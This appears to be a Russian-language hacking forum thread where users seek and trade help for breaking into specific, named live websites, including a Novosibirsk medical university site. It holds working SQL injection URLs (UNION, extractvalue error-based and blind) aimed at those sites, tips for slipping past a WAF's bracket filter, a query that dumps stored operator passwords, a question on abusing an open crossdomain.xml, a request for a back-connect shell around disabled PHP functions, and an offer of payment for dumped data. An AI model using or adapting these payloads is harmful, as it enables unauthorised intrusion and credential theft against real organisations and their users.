uname -a Code: Linux x.com 2.6.18-308.el5.028stab099.3 #1 SMP Wed Mar 7 15:56:00 MSK 2012 x86_64 хочу порутать, но проблема в том, что не могу сделать бэк-коннект из-за отключенных системных функций Code: Disabled PHP Functions: dl , exec , passthru , pcntl_exec , pfsockopen , popen , posix_kill , posix_mkfifo , posix_setuid , proc_close , proc_open , proc_terminate , shell_exec , system , leak , posix_setpgid , posix_setsid , proc_get_status , proc_nice , show_source , escapeshellcmd php 5.3.3 подскажите как можно это обойти и сделать бэк-коннект или хотя бы бинд порта.
Как обойти сей WAF? Code: http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,3+--+ True Code: http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,user()+--+ False
WAF срабатывает на скобки: true false а вот собственно и таблички: и да, обрати внимание, что это "НОВОСИБИРСКИЙ ГОСУДАРСТВЕННЫЙ МЕДИЦИНСКИЙ УНИВЕРСИТЕТ"
И забыл совсем про иные варианты команд. А как можно заменять скобки в таких конструкциях как concat? Char, base64? Хотя для char и base64 тоже нужны скобки.
Помогите со слепой скулей. скриптик написать или сдампить нужные данные. https://www.ckbproducts.com/ship_estimator.php?action=process POST сдампить нужно если нужно вознаграждение - в пм или жабу)
На сайте есть файл crossdomain.xml с таким содержимым: Code: <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> Как это можно использовать?
Blind Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28column_name%29from%28information_schema.columns%29where%60table_name%60=information_schema%20and%28ordinal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь.
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4®ion=2&sessionlogin=1%27 помогите раскрутить
http://sethsec.blogspot.ru/2014/03/exploiting-misconfigured-crossdomainxml.html что именно не получается? составьте корректный запрос и все нормально Code: http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4®ion=2&sessionlogin=1'|(extractvalue(1,repeat(version(),2)))='1
вот пример как вот здесь,почему не выводится,таким запросом 5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((select (select (select concat(0x27,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_id as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_passwort as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_kennung as char))),0x27) from `mlsvsf_db`.netzwerk_schnittstelle limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2)) having min(0))
В том то и дело, что не могу понять в чем ошибка моего запроса. 5я ветка... information_schema должна быть по определению... Unknown column 'information_schema' in 'where clause'
information_schema - бд "по определению" а не колонка/таблица =) у тебя же а надо, если нужна именно information_schema (хотя непонятно зачем она тебе):
Code: http://www.puntoverdefolletto.com/prodotto.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
в примере версия >5.1. у вас тоже? почему бы не использовать более короткий и понятный вектор? Code: http://www.paid2earn.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,version())))
